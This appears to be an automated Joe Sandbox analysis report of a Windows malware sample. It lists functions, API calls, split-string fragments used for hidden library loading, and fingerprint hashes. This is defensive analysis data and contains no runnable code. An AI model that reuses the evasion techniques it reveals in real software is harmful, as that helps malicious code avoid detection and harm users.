                                                                                                                                                                                                          • Opcode ID: ecfe80339bbb72631f42857859d98e6dd34d3a0e63a98b519c52c83b49425721
                                                                                                                                                                                                          • Instruction ID: dcf3a41d64c0706bf5efad368af1ded3e6e7c937e7379ded07362a9f70e5c64f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecfe80339bbb72631f42857859d98e6dd34d3a0e63a98b519c52c83b49425721
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3941A970A0864AEBDB10DF68D90978EFBE4FB94714F10429BE418A73D0EBB52604CB91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00000000), ref: 0046E325
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046E348
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: dbgh$dll$elp.$pF
                                                                                                                                                                                                          • API String ID: 2574300362-3995350128
                                                                                                                                                                                                          • Opcode ID: 04596cd7c4bebc8a8eec01d93673bd1038051d8ff990083c116c79df0d8d6966
                                                                                                                                                                                                          • Instruction ID: ab8c29164d7639cdc1ae5bcddf31798c7744adad730962cbd2eee6e0ac756f2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04596cd7c4bebc8a8eec01d93673bd1038051d8ff990083c116c79df0d8d6966
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 631158B0C04619DFDB14CF98E845BAEBBF8FF08704F00862EE815A3640EB74A544CB94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534703: GetLastError.KERNEL32(?,?,00524F60,0058C738,00000010), ref: 00534707
                                                                                                                                                                                                            • Part of subcall function 00534703: _free.LIBCMT ref: 0053473A
                                                                                                                                                                                                            • Part of subcall function 00534703: SetLastError.KERNEL32(00000000), ref: 0053477B
                                                                                                                                                                                                            • Part of subcall function 00534703: _abort.LIBCMT ref: 00534781
                                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 005302EF
                                                                                                                                                                                                          • _free.LIBCMT ref: 00530360
                                                                                                                                                                                                          • _free.LIBCMT ref: 00530379
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303AB
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303B4
                                                                                                                                                                                                          • _free.LIBCMT ref: 005303C0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1679612858-0
                                                                                                                                                                                                          • Opcode ID: 7c28300d30a2e01f8a24e8018a5ee38dbd121ccc91ba690453be9c10156dc588
                                                                                                                                                                                                          • Instruction ID: 7ac775a9220d468c373f7f1dfbd03a58822fafefdf22d3025bc52b1fca9c98a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c28300d30a2e01f8a24e8018a5ee38dbd121ccc91ba690453be9c10156dc588
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10B10975A0131ADFDB24DF18C899AADBBB4FF48304F5045AAE849A7390D771AE90CF40
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Mpunctctypestd::ios_base::width
                                                                                                                                                                                                          • String ID: ?p$@
                                                                                                                                                                                                          • API String ID: 3537416286-91208078
                                                                                                                                                                                                          • Opcode ID: 6c688737dc7317669eaf57710734688416a199bed6c3cae06b86dd0d44e4d75d
                                                                                                                                                                                                          • Instruction ID: 043d6d44f0a8152379de08877663cdff38541a1f6531e52b31651c7c046dfbf0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c688737dc7317669eaf57710734688416a199bed6c3cae06b86dd0d44e4d75d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1E13E71A10148DFCB04EF98C991AEEBBB5BF48304F14855EF909AB291D738AE45CF94
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile$AddressByteCharMultiProcWide
                                                                                                                                                                                                          • String ID: "%s%s"$"%s%s" %s$feirar
                                                                                                                                                                                                          • API String ID: 793792645-3199780743
                                                                                                                                                                                                          • Opcode ID: 8b8609be7a185562f73ad3219647ffe7627bcc46f96add53f677c349dd5e59c2
                                                                                                                                                                                                          • Instruction ID: 0c80a1f9fbdb3b4982757e3e4d378dad1e4a91e7e90a7f80602a8525095b87a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8609be7a185562f73ad3219647ffe7627bcc46f96add53f677c349dd5e59c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1C11770640204ABDB25DF24C889BDAF7A5FF09304F0451ABE8599B2C1D7786EE4CB97
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 00468283
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 00468299
                                                                                                                                                                                                          • ___from_strstr_to_strchr.LIBCMT ref: 004682E2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                          • String ID: %02X$in_disk
                                                                                                                                                                                                          • API String ID: 601868998-2956902724
                                                                                                                                                                                                          • Opcode ID: 52d3c2e3424f10aac8d941eebdd74e73d3cdc05850819a237190403e763b83e8
                                                                                                                                                                                                          • Instruction ID: 1989c8043e0b72275f30128f3445b6a3fb688df9cebe7e95dd5a1952a8af302c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52d3c2e3424f10aac8d941eebdd74e73d3cdc05850819a237190403e763b83e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB126716083429BD730DB24CC45BABBBE8BF85304F044A7EF9C997642EB7495488B93
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _strrchr.LIBCMT ref: 0045A3BD
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,?), ref: 0045A4D3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045A4E5
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045A4ED
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlInitializeCriticalSection.NTDLL(00597C64), ref: 00415E2E
                                                                                                                                                                                                            • Part of subcall function 00415DC0: __Init_thread_footer.LIBCMT ref: 00415E4A
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlEnterCriticalSection.NTDLL(00597C64), ref: 00415E65
                                                                                                                                                                                                            • Part of subcall function 00415DC0: RtlLeaveCriticalSection.NTDLL(00597C64), ref: 00415EBB
                                                                                                                                                                                                            • Part of subcall function 0046BB40: GetProcAddress.KERNEL32(?,?), ref: 0046BB78
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandle$AddressEnterInit_thread_footerInitializeLeaveObjectProcSingleWait_strrchr
                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                          • API String ID: 1861692331-2746444292
                                                                                                                                                                                                          • Opcode ID: c0519f0561d1263de137dad28d34114e192e9bb1ddd60408e0866fa429f1522f
                                                                                                                                                                                                          • Instruction ID: 2042a746c37683b5fe93729a1af4a6326984fea1b396c7364fbc35c38a601fa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0519f0561d1263de137dad28d34114e192e9bb1ddd60408e0866fa429f1522f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96A10AB1E0020C5ADF209A209C45BEF7768AB51309F5446DFFD0A97242E739DED8CB5A
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00401330: GetProcessHeap.KERNEL32 ref: 0040139A
                                                                                                                                                                                                            • Part of subcall function 00401330: __Init_thread_footer.LIBCMT ref: 004013CC
                                                                                                                                                                                                            • Part of subcall function 00401330: __Init_thread_footer.LIBCMT ref: 00401457
                                                                                                                                                                                                            • Part of subcall function 005136D8: RtlEnterCriticalSection.NTDLL(00596DF8), ref: 005136E3
                                                                                                                                                                                                            • Part of subcall function 005136D8: RtlLeaveCriticalSection.NTDLL(00596DF8), ref: 0051370F
                                                                                                                                                                                                          • FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000), ref: 0041613D
                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,00000006,00000006), ref: 00416189
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFindInit_thread_footerResourceSection$EnterHeapLeaveProcess
                                                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$mY$mY
                                                                                                                                                                                                          • API String ID: 3785588035-1709015650
                                                                                                                                                                                                          • Opcode ID: 5a2f1d6ba2502c82c6f869b35698a59d3d0892a62e3169168e37d918391b1c5f
                                                                                                                                                                                                          • Instruction ID: 270e102bd065b118de348aa4f1063a528aec08687396fef78cbaffba3b9d4602
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2f1d6ba2502c82c6f869b35698a59d3d0892a62e3169168e37d918391b1c5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C411671B00520ABD714ABA9DC45BBF76E4EF84714F01416EF806DB381DB38DD419BA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressEnterInit_thread_footerInitializeLeaveProc
                                                                                                                                                                                                          • String ID: \Global.db$\PHX\DT$\PHX\DU$erPa
                                                                                                                                                                                                          • API String ID: 3908199253-2618851521
                                                                                                                                                                                                          • Opcode ID: fb2f0a007127aa59ba6e9c80fa2dee8f4970b50855c1a864e8e1cc14d9be671a
                                                                                                                                                                                                          • Instruction ID: 22bd3ae536f36315dd3df5167b6fc734e0aae32db2466f701b3d24d96dad6565
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb2f0a007127aa59ba6e9c80fa2dee8f4970b50855c1a864e8e1cc14d9be671a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B31C671B00208AFDB14EF95C955BEEBBB4FB48704F00056EF409A72C1DB789A44CBA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,EFE0703F,00809318), ref: 0046C149
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0046C166
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                          • String ID: .dll$iphl$papi
                                                                                                                                                                                                          • API String ID: 2574300362-3203080450
                                                                                                                                                                                                          • Opcode ID: ed094ef179a710b71aacfa941f0bec4ed73de9946578c154e8a21e69b724d243
                                                                                                                                                                                                          • Instruction ID: 8f22f3a2ea63b0015d9947428c80e2858e96284ac2e6a20a641d7bb55d587829
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed094ef179a710b71aacfa941f0bec4ed73de9946578c154e8a21e69b724d243
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C116DB1904619DFDB10CF98D955BEEBBF8FB08704F10821EE415A7650EB749644CB90
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0052E284,00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002), ref: 0052E2F3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0052E306
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0052E284,00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000), ref: 0052E329
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                          • Opcode ID: b53ac596755930d52a6fadaac9d62fa639fc5f029d460c5187e126a61092a100
                                                                                                                                                                                                          • Instruction ID: 34cf3210dd55c905d628812567bb2e8a1e3267d31045eddd7af0ad4527f2ccef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b53ac596755930d52a6fadaac9d62fa639fc5f029d460c5187e126a61092a100
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F03138A00118BBCB159B95DC09BDEBFA8FF59716F014168F805A61A0DB749E45DB90
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ?p$reschk$resmd$setres
                                                                                                                                                                                                          • API String ID: 0-1727112364
                                                                                                                                                                                                          • Opcode ID: 48672ed122b0bddd77802af3c119839ac589ff094414b07231c4035a80841895
                                                                                                                                                                                                          • Instruction ID: b6887b571b79c76cb28713bcc6fd15bb5ca461b69fd2106e21546973d5c59f29
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48672ed122b0bddd77802af3c119839ac589ff094414b07231c4035a80841895
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C1F7709002189BEF24DF78CE597DEBBB2EF45304F10859DD409AB292DBB95A84CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Mpunctshared_ptr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3707918647-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Rar$http$https
                                                                                                                                                                                                          • API String ID: 0-4117486229
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 0046C79D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID: .dll$el32$kern
                                                                                                                                                                                                          • API String ID: 4139908857-1222553051
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole3,?), ref: 0046E491
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID: 2.dl$l$ole3
                                                                                                                                                                                                          • API String ID: 4139908857-965305729
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597F80), ref: 004562CE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004562EA
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 00456305
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597F80), ref: 004564B8
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00520705,?,00000000,00000000,00000001,00000000,?,00000001,00520705,00000003), ref: 00538176
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005381FF
                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0051F4B6,?), ref: 00538211
                                                                                                                                                                                                          • __freea.LIBCMT ref: 0053821A
                                                                                                                                                                                                            • Part of subcall function 00534B51: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597D88), ref: 004461AF
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004461CB
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597D88), ref: 004461E6
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597D88), ref: 0044627D
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: caa77ec5b49612b5673c168ead499d84065c5d174e9d5e189b540c952119de36
                                                                                                                                                                                                          • Instruction ID: 4283bbc0da10fafe2ed3447f10d9f0859ebea693bd00dc1e685b078856472080
                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa77ec5b49612b5673c168ead499d84065c5d174e9d5e189b540c952119de36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31AB70A04709EBDB04DF58D9097AEBBF4FF99724F20025BE418A7381D7B82A049B85
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048E3D0: GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          • CreateFileW.KERNEL32(EFE0703F,40000000,00000001,00000000,00000002,00000000,00000000,EFE0703F,00000000), ref: 0048E2C8
                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0048E2FE
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00597A94,00000010,?,00000000), ref: 0048E324
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048E33E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Create$AddressCloseHandleProcWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2894970915-0
                                                                                                                                                                                                          • Opcode ID: 2f4382049ca2a752f84ed54e7643d14688204e1f1246283fdc424cff93cbb240
                                                                                                                                                                                                          • Instruction ID: 55e22696e4cdb543d992f818e317bf2f8fad95eeb2f4fe8dfbbcc67412793603
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f4382049ca2a752f84ed54e7643d14688204e1f1246283fdc424cff93cbb240
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A431C331A41208EFDB10DBA4DC46FDEBBB4EB15B14F50052AF911B72C0DB746A48CB94
